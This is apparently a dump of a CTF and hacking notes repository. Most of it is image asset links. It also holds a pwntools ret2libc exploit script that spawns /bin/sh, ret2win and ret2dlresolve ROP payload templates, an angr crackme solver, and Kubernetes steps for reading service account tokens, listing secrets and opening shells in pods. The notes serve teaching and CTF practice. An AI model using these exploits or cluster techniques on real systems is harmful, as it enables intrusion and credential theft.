https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3) (3) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (3) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3) (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3) (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3) (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3) (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (30) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (30) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (30).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (30).png -------------------------------------------------------------------------------- /.gitbook/assets/image (31).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (31).png -------------------------------------------------------------------------------- /.gitbook/assets/image (32).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (32).png -------------------------------------------------------------------------------- /.gitbook/assets/image (33).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (33).png -------------------------------------------------------------------------------- /.gitbook/assets/image (34).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (34).png -------------------------------------------------------------------------------- /.gitbook/assets/image (35).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (35).png -------------------------------------------------------------------------------- /.gitbook/assets/image (36).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (36).png -------------------------------------------------------------------------------- /.gitbook/assets/image (37).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (37).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (38) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (38).png -------------------------------------------------------------------------------- /.gitbook/assets/image (39).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (39).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (40).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (40).png -------------------------------------------------------------------------------- /.gitbook/assets/image (41).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (41).png -------------------------------------------------------------------------------- /.gitbook/assets/image (42).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (42).png -------------------------------------------------------------------------------- /.gitbook/assets/image (43).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (43).png -------------------------------------------------------------------------------- /.gitbook/assets/image (44).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (44).png -------------------------------------------------------------------------------- /.gitbook/assets/image (45).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (45).png -------------------------------------------------------------------------------- /.gitbook/assets/image (46).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (46).png -------------------------------------------------------------------------------- /.gitbook/assets/image (47).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (47).png -------------------------------------------------------------------------------- /.gitbook/assets/image (48).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (48).png -------------------------------------------------------------------------------- /.gitbook/assets/image (49).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (49).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (50).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (50).png -------------------------------------------------------------------------------- /.gitbook/assets/image (51).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (51).png -------------------------------------------------------------------------------- /.gitbook/assets/image (52).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (52).png -------------------------------------------------------------------------------- /.gitbook/assets/image (53).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (53).png -------------------------------------------------------------------------------- /.gitbook/assets/image (54).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (54).png -------------------------------------------------------------------------------- /.gitbook/assets/image (55).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (55).png -------------------------------------------------------------------------------- /.gitbook/assets/image (56).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (56).png -------------------------------------------------------------------------------- /.gitbook/assets/image (57).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (57).png -------------------------------------------------------------------------------- /.gitbook/assets/image (58).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (58).png -------------------------------------------------------------------------------- /.gitbook/assets/image (59).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (59).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6) (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6) (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (6).png -------------------------------------------------------------------------------- /.gitbook/assets/image (60).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (60).png -------------------------------------------------------------------------------- /.gitbook/assets/image (61).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (61).png -------------------------------------------------------------------------------- /.gitbook/assets/image (62).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (62).png -------------------------------------------------------------------------------- /.gitbook/assets/image (63).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (63).png -------------------------------------------------------------------------------- /.gitbook/assets/image (64).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (64).png -------------------------------------------------------------------------------- /.gitbook/assets/image (65).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (65).png -------------------------------------------------------------------------------- /.gitbook/assets/image (66).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (66).png -------------------------------------------------------------------------------- /.gitbook/assets/image (67).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (67).png -------------------------------------------------------------------------------- /.gitbook/assets/image (68).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (68).png -------------------------------------------------------------------------------- /.gitbook/assets/image (69).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (69).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7) (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7) (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7) (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (7).png -------------------------------------------------------------------------------- /.gitbook/assets/image (70).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (70).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (8) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (8).png -------------------------------------------------------------------------------- /.gitbook/assets/image (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image (9).png -------------------------------------------------------------------------------- /.gitbook/assets/image-removebg-preview (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image-removebg-preview (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/mtp showcase.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/mtp showcase.gif -------------------------------------------------------------------------------- /.gitbook/assets/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/output.png -------------------------------------------------------------------------------- /.gitbook/assets/p4BwhIKR9S.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/p4BwhIKR9S.png -------------------------------------------------------------------------------- /.gitbook/assets/ret2libc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.binary = elf = ELF("./pb") 4 | libc = ELF("glibc/libc.so.6", checksec=False) 5 | p = process(aslr=True) 6 | # p = remote("10.10.10.10", 1337) 7 | 8 | rop = ROP(elf) 9 | rop.puts(elf.got["puts"]) 10 | rop.main() 11 | 12 | OFFSET = 56 # Find using cyclic 13 | 14 | payload = flat({ 15 | OFFSET: [ 16 | rop.chain() 17 | ] 18 | }) 19 | 20 | p.sendlineafter(b"> ", payload) 21 | 22 | p.recvuntil(b"thank you!\n") # Some text printed before `ret` instruction 23 | 24 | r = p.recv(6) # Receive address of `puts()` as binary data 25 | leak = u64(r.ljust(8, b"\x00")) 26 | success("Leaked puts(): %#x", leak) 27 | 28 | libc.address = leak - libc.symbols["puts"] 29 | success("Libc base: %#x", libc.address) 30 | 31 | rop = ROP(libc) 32 | rop.call(rop.ret) 33 | rop.system(next(libc.search(b"/bin/sh"))) 34 | rop.exit() 35 | 36 | payload = flat({ 37 | OFFSET: [ 38 | rop.chain() 39 | ] 40 | }) 41 | 42 | p.sendlineafter(b"> ", payload) 43 | 44 | p.interactive() 45 | -------------------------------------------------------------------------------- /.gitbook/assets/session_2.WinSta0.Default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/session_2.WinSta0.Default.png -------------------------------------------------------------------------------- /.gitbook/assets/shell.coll.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JorianWoltjer/practical-ctf/9ac2ad7214ecba43494a69f9c8ce091f2fdef427/.gitbook/assets/shell.coll.php -------------------------------------------------------------------------------- /.gitbook/assets/solve_with_angr.py: -------------------------------------------------------------------------------- 1 | # https://zeta-two.com/assets/other/nixucon18-slides.pdf 2 | # https://research.kudelskisecurity.com/2016/08/08/angr-management-first-steps-and-limitations/ 3 | # https://flagbot.ch/lesson5.pdf <--- this one was by far the most useful. 4 | 5 | import os, stat 6 | import angr 7 | import claripy 8 | from pwn import ELF 9 | 10 | # The is the library we are massaging. 11 | e = ELF("./CrackThePassword") 12 | 13 | target = e.sym.validatePassword 14 | 15 | BASE = 0x0 16 | ADDR_START = BASE + target 17 | ADDR_GOOD = BASE + target + 0x490 18 | # At this point, the checker function has decided to return 0 19 | ADDR_BAD = BASE + target + 0x497 20 | 21 | # Start a new project with the modded binary and some magic options. 22 | proj = angr.Project( 23 | e.path, main_opts={"base_addr": BASE}, 24 | load_options={ 25 | "auto_load_libs": False, 26 | "use_system_libs": False, 27 | } 28 | ) 29 | 30 | # We know what the flag has a certain size, so we can create a bitvector of precisely the right 31 | # length. No worries if you dont, some bytes will just get resolved to 0x00 by angr. 32 | flag_size = 32 33 | flag = claripy.BVS("flag", 8*flag_size) 34 | 35 | # Create a new project, and disable some of the unconstraint/uninitialized memory settings. 36 | # The binary we're targetting isn't quite "normal", so angr gets a bit confused here. 37 | # 38 | # The cool thing here is thay the call_state allows us to call into a specific piece of memory 39 | # with an argument, like a pointer to the symbolic flag. 40 | state = proj.factory.call_state( 41 | ADDR_START, 42 | flag, 43 | add_options = { 44 | angr.options.ZERO_FILL_UNCONSTRAINED_MEMORY, 45 | angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS 46 | }) 47 | 48 | # Adding constraints to the solver to obtain values that are in the printable range 49 | for i in flag.chop(8): 50 | state.solver.add(i >= 0x20) 51 | state.solver.add(i <= 0x7f) 52 | 53 | # Start a simulation 54 | simgr = proj.factory.simulation_manager(state) 55 | simgr.explore(find=ADDR_GOOD, avoid=ADDR_BAD) 56 | 57 | if len(simgr.found) > 0: 58 | found = simgr.found[0] 59 | 60 | val_flag = found.solver.eval(flag, cast_to=bytes) 61 | val_flag = val_flag.strip(b"\0") 62 | 63 | print("flag: {}".format(val_flag.decode())) 64 | else: 65 | print("No solution... :(") 66 | 67 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A big collection of my notes for Capture The Flag (CTF) challenges or Hacking 4 | in general 5 | cover: .gitbook/assets/hmBaYmHbB8.png 6 | coverY: -121 7 | layout: 8 | cover: 9 | visible: true 10 | size: full 11 | title: 12 | visible: true 13 | description: 14 | visible: true 15 | tableOfContents: 16 | visible: true 17 | outline: 18 | visible: true 19 | pagination: 20 | visible: false 21 | --- 22 | 23 | # 🚩 Home - Practical CTF 24 | 25 | :clipboard: Contains lots of copy-paste-ready commands/scripts to get things done quickly 26 | 27 | :brain: I aim to explain as much as possible how and why the attack works 28 | 29 | :man\_technologist: Inspired by [HackTricks](https://book.hacktricks.xyz/welcome/readme) but in my style, and including all the experiences I've had 30 | 31 | {% hint style="warning" %} 32 | This book won't ever be 'done' as I will keep updating it while I learn stuff. You can \ 33 | ![](<.gitbook/assets/image (2) (1).png>)[**Watch**](https://github.com/JorianWoltjer/practical-ctf/commits/main.atom) the _RSS feed_ on my GitHub repository to see every change that happens! 34 | {% endhint %} 35 | 36 | ## Motivation 37 | 38 | I make a lot of writeups on my blog where I explain how I solved a specific fun challenge. This is often to explain to others, but also partly to look back on if I remember _that_ I have done something, but not exactly _how_. 39 | 40 | {% embed url="https://jorianwoltjer.com/blog/" %} 41 | My blog where I post CTF writeups, and general Hacking-related things 42 | {% endembed %} 43 | 44 | This book aims to be a big encyclopedia of everything I know about hacking. That way I can always look back at this book if I have done something before, without needing a full challenge with a writeup. Everything is written by myself unless specified otherwise. 45 | 46 | Get started by choosing a topic on the left sidebar, or search for anything in the top right! 47 | -------------------------------------------------------------------------------- /binary-exploitation/ret2win.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Jump to a predefined function in the binary, even with arguments 3 | --- 4 | 5 | # ret2win 6 | 7 | When you have found a buffer overflow, you can set the Instruction Pointer to any value by overwriting it. In some simple cases, there is a predefined function in the binary that may not even be used but can be jumped to. This is always an easy win, so check if this is the case in your binary. You can use `objdump -d ./binary` to view the disassembly of all known functions, or you can look at a decompiler of your choice to find these functions. 8 | 9 | To exploit it, you can use the simple PwnTools ROP functionality to find any required ROP gadgets automatically and resolve function names for you. 10 | 11 | ```python 12 | elf = ELF("./binary") 13 | rop = ROP(elf) 14 | rop.win() 15 | 16 | payload = flat({ 17 | OFFSET: rop.chain() 18 | }) 19 | ``` 20 | 21 | The example above will call a function named `win()` in your binary, and then use the `flat()` function to add the required amount of padding before the return address (`rop.chain`). If you have the correct offset, it will now jump to and run your function. 22 | 23 | {% hint style="warning" %} 24 | In some cases, the stack might be misaligned causing segmentation faults even when doing it correctly like this. In such a case, you can simply realign the stack by inserting a single `ret` instruction before actually jumping to the desired function. 25 | 26 | 
rop = ROP(elf)
27 | rop.call(rop.ret)
28 | rop.win()
29 |
30 | {% endhint %} 31 | 32 | ## Adding arguments 33 | 34 | With some more PwnTools magic adding arguments to a function call can also be really easy: 35 | 36 | ```python 37 | rop = ROP(elf) 38 | rop.win(42, 1337) 39 | ``` 40 | 41 | But sometimes you need a string, which is a little harder. Strings are stored as **pointers** (addresses) to the string. This means the string itself is not actually stored on the stack we are overflowing, only the address is. We can only set the address, so we need to find some address where the string is stored. 42 | 43 | If you can leak addresses like the stack pointer, you can simply calculate and point it to the address of your own payload, where you completely control the value as it is your input. 44 | 45 | If you can only leak an address like libc, you can search in that binary to find the string you need. For example: 46 | 47 | ```python 48 | libc = ELF("./libc.so.6") 49 | bin_sh = next(libc.search(b"/bin/sh")) # 0x7fcdf0446698 50 | 51 | rop.system(bin_sh) # Call with string argument 52 | ``` 53 | 54 | This way you can still call functions with specific string arguments, to get a shell in this case. 55 | -------------------------------------------------------------------------------- /binary-exploitation/return-oriented-programming-rop/ret2dlresolve.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A way to exploit buffer overflows using ROP when not many gadgets are 4 | available, and Full RELRO is disabled 5 | --- 6 | 7 | # ret2dlresolve 8 | 9 | Ret2dlresolve is a technique that can be used to trick the binary into resolving a specific function, such as `system()`, into the PLT (Procedure Linkage Table). By doing this, you can use the PLT function as if it was an original component of the binary. This bypasses ASLR and does not require any leaks of the libc address. 10 | 11 | The attack is only possible when you can overwrite GOT entries, making it impossible on Full RELRO. On both No RELRO and Partial RELRO this attack is possible however: 12 | 13 | ![](<../../.gitbook/assets/image (2) (1) (1) (1) (1).png>) 14 | 15 | For a more detailed explanation see: 16 | 17 | {% embed url="https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve" %} 18 | Detailed analysis and information about ret2dlresolve from ir0nstone's notes 19 | {% endembed %} 20 | 21 | ## PwnTools 22 | 23 | PwnTools contains a [`ret2dlresolve`](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html) function that can generate payloads for this attack automatically. 24 | 25 | ### `read()` 26 | 27 | ```python 28 | rop = ROP(elf) 29 | dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['sh']) 30 | rop.raw(rop.ret) # Align stack (64-bit) 31 | rop.read(0, dlresolve.data_addr) # Call read function to write data 32 | rop.ret2dlresolve(dlresolve) # Write data 33 | 34 | p.sendline(flat({ 35 | OFFSET: rop.chain(), 36 | })) 37 | p.sendline(dlresolve.payload) # Run /bin/sh 38 | 39 | p.interactive() 40 | ``` 41 | 42 | ### `gets()` 43 | 44 | ```python 45 | rop = ROP(elf) 46 | dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['sh']) 47 | rop.raw(rop.ret) # Align stack (64-bit) 48 | rop.gets(dlresolve.data_addr) # Call read function to write data 49 | rop.ret2dlresolve(dlresolve) # Write data 50 | 51 | p.sendline(flat({ 52 | OFFSET: rop.chain(), 53 | })) 54 | p.sendline(dlresolve.payload) # Run /bin/sh 55 | 56 | p.interactive() 57 | ``` 58 | -------------------------------------------------------------------------------- /cloud/kubernetes.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Container Orchestration for managing big scalable infrastructure of 4 | containerized applications 5 | --- 6 | 7 | # Kubernetes 8 | 9 | {% embed url="https://kubernetes.io/docs/reference/glossary/?fundamental=true" %} 10 | Description of many common terminology in the Kubernetes world 11 | {% endembed %} 12 | 13 | The way of attacking a Kubernetes cluster is similar to attacking Windows Active Directory: 14 | 15 | 1. Find a **vulnerability** in an application (RCE, SSRF, SSH, etc.) 16 | 2. Perform **Lateral Movement** to access more pods and nodes with higher privileges 17 | 3. Reach the **Highest Privileges** to do anything an attacker wants 18 | 19 | ## Initial Access 20 | 21 | The `/var/run/secrets/kubernetes.io/serviceaccount/token` file (sometimes `/run` instead of `/var/run`) on a Kubernetes pod contains a Service Account Token in the form of a [JSON Web Token](https://jwt.io/). It can be decoded, and the payload tells you exactly who or what the account belongs to: 22 | 23 |

Decoded k8 Service Account Token (source)

24 | 25 | This token can be used for **Lateral Movement** in the rest of the cluster and interact with the API server, and due to being in the internal network, a lot more servers are now accessible. A few useful endpoints are: 26 | 27 | * `/api/v1/namespaces/default/pods/`: List all pods 28 | * `/api/v1/namespaces/default/secrets/`: List all secrets 29 | 30 | These can be requested with the found Service Account Token (JWT) as a header: 31 | 32 | ```bash 33 | curl -v -H 'Authorization: Bearer ' https:///... 34 | ``` 35 | 36 | If the machine has `kubectl` installed (or you download a [static binary](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux)), it is also possible to simply use it instead of manual `curl` commands. Some similar and useful commands are: 37 | 38 | 
# # List everything
39 | $ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify
40 | $ kubectl get pods     # List pods
41 | $ kubectl get secrets  # List secrets
42 | 
43 | # # Execute an interactive shell with a pod
44 | $ kubectl exec <POD_NAME> --stdin --tty  -- /bin/bash
